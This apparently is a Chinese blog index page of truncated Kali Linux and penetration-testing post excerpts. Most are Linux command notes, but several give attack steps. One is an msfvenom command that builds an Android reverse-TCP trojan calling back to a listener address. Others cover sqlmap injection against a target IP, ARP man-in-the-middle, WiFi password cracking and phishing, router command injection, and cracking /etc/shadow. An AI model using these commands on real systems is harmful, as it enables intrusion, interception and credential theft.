weixin_49071539的博客

1.下载完复制到虚拟机中2.找到存放的路径我的存放在/var/run/vmblock-fuse/blockdir/0J5BTa 下3.将其移动到mv burpsuite_pro_v2021.2.1.rar /usr/lib/jvm/java-11-openjdk-amd64/bin4.rar e burpsuite_pro_v2021.2.1.rar 进行解压（若没有rar，自行安装即可）5.java --illegal-access=permit -Dfile.encoding=utf-8 -ja

转载：https://xz.aliyun.com/t/9394前言：D-Link DIR-816 A2是中国台湾友讯（D-Link）公司的一款无线路由器。攻击者可借助‘datetime’参数中的shell元字符利用该漏洞在系统上执行任意命令。准备：固件版本 1.10B05：http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-816漏洞存在的程序：goahead0x2 工具静态分析工具：IDA系统文件获取：binwalk动态调.

清华大学开源软件镜像站https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2020.4/?C=N&O=A

1. 在/etc/sysctl.conf的配置文件中,修改变量net.ipv4.ip_forward的值为 1，把前面的 # 去掉;若此变量没有,那就添加,net.ipv4.ip_forward=12. 下载ettercapapt-get install ettercap使用图像界面ettercap -G3. ettercap -G 启动 sniffing at startup 开启 primary interface 选择wlan0 点击右上角√4. 开始ARP中间

chmod命令 使用权限 : 所有使用者 使用方式 : chmod [-cfvR] [--help] [--version] mode file... 说明 : Linux/Unix 的档案调用权限分为三级 : 档案拥有者、群组、其他。利用 chmod 可以藉以控制档案如何被他人所调用。 参数 : mode : 权限设定字串，格式如下 : [ugoa...][[+-=][rwxX]...][,...]，其中u 表示该档案的拥有者，g 表示

今天重新装了kali虚拟机，使用xshell远程连接时候发现无法连接没有权限。于是查了些资料终于想起来了，修改的配置文件。记录一下。1.修改配置文件vim /etc/ssh/sshd_config2.修改内容#PermitRootLogin prohibit-passwordPermitRootLogin yes#PasswordAuthentication yesPasswordAuthentication yes3.启动ssh服务systemctl start ssh.ser.

tar解包：tar xvf FileName.tar打包：tar cvf FileName.tar DirName（注：tar是打包，不是压缩！）———————————————.gz解压1：gunzip FileName.gz解压2：gzip -d FileName.gz压缩：gzip FileName.tar.gz解压：tar zxvf FileName.tar.gz压缩：tar zcvf FileName.tar.gz DirName———————————————.bz2解压

kali2020默认是kali用户，用起来非常的不方便，每次都要sudo su更换到root用户，而且root用户还登录失败解决方法：1. 打开终端。登录启动页面按E进入修改找到以linux开头的行，· 将ro改成rw；· 在在本句结尾添加 init=/bin/bash修改root密码sudo passwd root //先输入这串神奇代码2. 输入旧密码3. 输入新密码，重复4. 重启kali 用root用户登录，并且输入步骤3的新密码修改完成后，root@kali 颜.

2020最新kali安装中文输入法1.打开kali命令终端2.安装输入法框架fcitx3.安装输入法4.配置google拼音输入法1.安装输入法框架fcitx1. 输入sudo apt install fcitx【因为是普通用户所以需要输入登录密码进行认证】2. 输入y进行确认，或者直接回车默认是y3. 安装完成2.安装输入法1. 输入sudo apt install fcitx-googlepinyin,直接回车（默认为y）或者输入y回车2. 安装完成3. 重启kali系统，输入

系统目录结构Linux目录结构如下图所示，其中最顶层“/”是根目录。熟悉Linux目录非常重要，不同的目录有不同的作用。比如，搭建网站有对应的目录，代码审计同样需要熟悉目录，文件扫描更需要知道不同目录存放的文件及相关信息。Linux根目录中输入“ls”可以查看目录结构。各目录的功能及含义如下：bin：Binary的缩写，存放普通用户可执行的一些命令，命令是以文件形式存储，如cat、ls、pwd等。boot：存放系统装载引导程序、设备启动核心文件，如内核、initrd以及grub。dev：D

此教程使用靶场实战演示，仅供学习未经授权切勿用于非法用途 ！1.发现此网址可能存在sql注入漏洞，我们进行sql盲注入测试一下是否存在漏洞。地址栏输入 and 1=1 发现页面正常显示。再次输入and 1=2 页面出现错误，说明该页面可能存在sql注入漏洞2.现在拿出我们的kali工具，sqlmap进行注入测试。sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs3.可以看到存在注入漏洞，扫到了5个数据库。要获.

生成反弹木马命令msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.146 lport=55555 R > /home/111.apk生成一个木马程序111.exe，没有添加任何免杀，很容易被安全软件检测出，这里先介绍一下参数信息-a 设置目标的指令集架构，x86=32位 x64=64位–platform 设置目标平台，这里是windows，可以通过–help-platforms选项查看msfvenom支持的所有平台 ，也

ps:代码复制黏贴即可，有什么问题下方留言，博主会及时回复 !工具：1：笔记本2：USB无线网卡（必备）3：kali系统4：靠谱字典暴力破解法：何为暴力破解呢，其实就是一个一个密码试，直到正确的密码为止。现在的wifi一般加密都是：1、不启用安全‍‍‍‍2、WEP‍‍‍‍3、WPA/WPA2-PSK（预共享密钥）‍‍‍‍4、WPA/WPA2 802.1X （radius认证）1. 使用airmon-ng命令检查网卡是否支持监听模式root@kali:~# airmon-ng可以

dnsenum -f /usr/share/dnsenum/dns.txt sdjtxxxx.com-f 匹配kali自带的字典。

wifiphisher使用教程1. 接入网卡–>虚拟机–>可移动设备–>选择网卡名称–>连接主机2. 查看网卡是否接入成功----------------------ifconfig3. 启动网卡------------airmon-ng start wlan04. 下载安装wifiphisherkali下-----------------------apt-get install wifiphisher其它的系统也可安装，可能要GitHub上找文件5. 启动wifip

Kali Linux 2020.1修改root用户密码 安装Kali Linux 2020.1系统后，需要使用root用户权限安装软件。由于root用户的默认密码未知，所以需要在单用户模式下重新设置root用户密码。操作步骤如下：（1）启动Kali Linux，进入启动界面。（2）选择Kali GNU/Linux项，并按下e键，进入Grub编辑界面。（3）选择到Linux行，将ro修改为rw，并在末尾添加init=/bin/bash。（4）按下Ctrl+X或F10重新启动系统，即可进入单用户模式。。

whois 域名/ip 查看域名的详细信息。ping 域名/ip 测试本机到远端主机是否联通。dig 域名/ip 查看域名解析的详细信息。host -l 域名 dns服务器 传输zone。扫描nmap:-sS 半开扫描TCP和SYN扫描。-sT 完全TCP连接扫描。-sU UDP扫描-PS syn包探测(防火墙探测)-PA ack包探测(防火墙探测)-PN 不ping。-n 不dns解析。-A -O和-sV。-O 操作系统识别。-sV 服务版本信息(banner)-p 端口扫

移动：cd /目录/----------------------------------------进入指定目录cd … --------------------------------------------退出到上层目录cd ------------------------------------------------退出到根目录cp -v /root/aaa.txt /root2--------------------把/root中的aaa.txt复制到root2中 -v 显示结果m

简介SMB(全称是Server Message Block)是一个协议名，它能被用于Web连接和客户端与服务器之间的信息沟通。用于局域网分享网络文件用，也可以打印。samba 是基于SMB协议（ServerMessage Block，信息服务块）的开源软件，samba也可以是SMB协议的商标。SMB是一种Linux、UNIX系统上可用于共享文件和打印机等资源的协议，这种协议是基于Client\Server型的协议，Client端可以通过SMB访问到Server（服务器）上的共享资源。当Windows是

用法mv [选项]… [-T] 源文件 目标文件或：mv [选项]… 源文件… 目录或：mv [选项]… -t 目录 源文件…将<源文件>重命名为<目标文件>，或将<源文件>移动至指定<目录>。必选参数对长短选项同时适用。–backup[=CONTROL] 为每个已存在的目标文件创建备份-b 类似–backup 但不接受参数-f, --force

sqlmap使用前，测试网页是否存在可注入漏洞：1.寻找形如“.asp?id=xx”类的带参数的URL。2.去掉“id=xx”查看页面显示是否正常，如果不正常，说明参数在数据传递中是直接起作用的。3.清空浏览器地址栏，输入“javascript:alert(document.cookie=“id=”+escape(“xx”));”，按Enter键后弹出一个对话框，内容是“id=xx”，然后用原来的URL刷新页面，如果显示正常，说明应用是用Request(“id”)这种方式获取数据的。4.重复上面的步

cewl当你要爆破一个网站的登陆页面，可以使用CeWL来映射网站,也就是可以爬取网站上的关键词或类似词的有用信息，来做成字典。简单使用方法如下cewl www.baidu.com -w baidu.txtlscat baidu.txt

xss漏洞扫描教程git clone https://github.com/hahwul/XSpear.gitcd XSpear/lsgemsudo gem install XSpear-1.4.1.gem(往后版本可能会更新，根据文件夹里的版本进行下载）XSpear -u “http://test.php.vulnweb.com/listproducts.php?cat=123” -v 1注：https://bit.ly/35NOnDS 这是一个极易受攻击的安卓实验室！！！...

Nmap 命令参数解析 扫描之前先来看一下参数解析.-sT TCP connect() 扫描，这是最基本的 TCP 扫描方式。这种扫描很容易被检测到，在目标主机的日志中会记录大批的连接请求以及错误信息。-sS TCP 同步扫描 (TCP SYN)，因为不必全部打开一个 TCP 连接，所以这项技术通常称为半开扫描 (half-open)。这项技术最大的好处是，很少有系统能够把这记入系统日志。不过，你需要 root 权限来定制 SYN 数据包。-sF,-sX,-sN 秘密 FIN 数据包

netstat-a (all)显示所有选项，默认不显示LISTEN相关-t (tcp)仅显示tcp相关选项-u (udp)仅显示udp相关选项-n 拒绝显示别名，能显示数字的全部转化成数字。-l 仅列出有在 Listen (监听) 的服務状态-p 显示建立相关链接的程序名-r 显示路由信息，路由表-e 显示扩展信息，例如uid等-s 按各个协议进行统计-c 每隔一个固定时间，执行该netstat命令。提示：LISTEN和LISTENING的状态只有用-a或者-l才能看到...

fping-aLists targets that responded显示可ping通的目标-ALists targets by address instead of hostname将目标以ip地址的形式显示-b Sends bytes of data per ICMP packet (default 56)ping 数据包的大小。（默认为56）-B Tells fping to wait times longer for a reply after each successiv

COMMIX简介commix 是一款由 python 编写，开源自动化检测系统命令注入工具 下载地址如下 github.com/commixproject/commix参数选项：-v 　　　　　　　　　　VERBOSE详细程度级别（0-1，默认值：0）。–version　　　　 　　显示版本号并退出。–output-dir=… 　　设置自定义输出目录路径。-s SESSION_FILE　　 从存储（.sqlite）文件加载会话。–flush-session　　 刷新当前目标的会话文件。–

cd /home/etccat passwd下面会展示各种信息，账号密码（加密处理过的）adduser adcomgming(新建一个管理账号，dacongming）根据提示填入账号密码用户名个人信息等继续ycd /home回到家目录下ls查看，会发现多了一个管理员cat /etc/passwd会看到多了一个管理员账户信息cat /etc/shadow会找到加密的管理员账号密码unshadow /etc/passwd /etc/shadow > pass.txt将/etc

xss漏洞扫描教程git clone https://github.com/hahwul/XSpear.gitcd XSpear/lsgemsudo gem install XSpear-1.4.1.gem(往后版本可能会更新，根据文件夹里的版本进行下载）XSpear -u “http://test.php.vulnweb.com/listproducts.php?cat=123” -v 1推荐：https://bit.ly/35NOnDS 一个极易受攻击的安卓实验室，可以用来练习..

工具：1：笔记本2：USB无线网卡（必备）3：kali系统4：靠谱字典第一种方法：暴力破解法何为暴力破解呢，其实就是一个一个密码试，直到正确的密码为止。现在的wifi一般加密都是：1、不启用安全‍‍‍‍2、WEP‍‍‍‍3、WPA/WPA2-PSK（预共享密钥）‍‍‍‍4、WPA/WPA2 802.1X （radius认证）使用airmon-ng命令检查网卡是否支持监听模式root@kali:~# airmon-ng可以看到无线网卡wlan0是支持监听模式的。如果该命令没有任何输

步骤扫描映射web信息cewl www.xxx.com扫描网站服务器信息（对http协议可用）whatweb www.xxx.com根据上面扫描的IP地址进行漏洞扫描，扫描开放的端口nmap xxx.xxx.xxx.xxx -v

使用实例实例1：使用wget下载单个文件$wget http://www.minjieren.com/wordpress-3.1-zh_CN.zip说明：以上例子从网络下载一个文件并保存在当前目录，在下载的过程中会显示进度条，包含（下载完成百分比，已经下载的字节，当前下载速度，剩余下载时间）。实例2：使用wget -O下载并以不同的文件名保存$wget -O wordpress.zip http://www.minjieren.com/download.aspx?id=1080wget默认会以最

fping扫描网络存活主机，并保存为文件：root@kali:~# fping -g 192.168.50.0/24 -a -q > activeHostroot@kali:~# cat activeHost192.168.50.1192.168.50.2192.168.50.128端口扫描：扫描192.168.0.3这台主机开放了哪些端口；[root@laolinux ~]# nmap -sT 192.168.0.3Starting Nmap 4.11 ( http://www.

scp 跨机远程拷贝scp是secure copy的简写，用于在Linux下进行远程拷贝文件的命令，和它类似的命令有cp，不过cp只是在本机进行拷贝不能跨服务器，而且scp传输是加密的。当你服务器硬盘变为只读 read only system时，用scp可以帮你把文件移出来。注解类似的工具有rsync；scp消耗资源少，不会提高多少系统负荷，在这一点上，rsync就远远不及它了。rsync比scp会快一点，但当小文件多的情况下，rsync会导致硬盘I/O非常高，而scp基本不影响系统正常使用。命令格

kali防火墙kali关闭防火墙前需要安装ufw安装apt-get install ufw关闭ufw disable # To disable the firewall开启ufw enable # To enable the firewall////////////////////////很多问题都出现于防火墙问题，新手刚使用kali系统时候，建议先关闭防火墙...

lsoflsof(list open files)是一个列出当前系统打开文件的工具。lsof 查看端口占用语法格式：lsof -i:端口号实例查看服务器 8000 端口的占用情况：lsof -i:8000COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAMEnodejs 26993 root 10u IPv4 37999514 0t0 TCP *:8000 (LISTEN)lsof输出各列信息的意义如下：C

PS工具ps工具标识进程的5种状态码:D 不可中断 uninterruptible sleep (usually IO)R 运行 runnable (on run queue)S 中断 sleepingT 停止 traced or stoppedZ 僵死 a defunct (”zombie”) process4.1. 命令参数a 显示所有进程-a 显示同一终端下的所有程序-A 显示所有进程c 显示进程的真实名称-N 反向选择-e 等于“-A”e 显示环境变量f 显示程序间的关

查看当前文件夹内的文件：dir //不区分文件格式ls //颜色区分文件夹与文件进入a文件夹：cd a新建文件夹：mkdir删除文件夹：rmdir删除文件：rm -rf 文件编辑a文件：vi a //vi相当于记事本简洁操作vim a //vim相当于eclipse/EditPlus功能相对强大一点退出编辑：键盘ESC退出并保存：wq退出不保存：q强制退出：q!https://www.kali.org/docs/

11182020KALI源1.更新软件源sudo vim /etc/apt/sources.list2.选择比较合适的源(选择一个即可）#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#阿里云deb http://mirrors.aliyun.co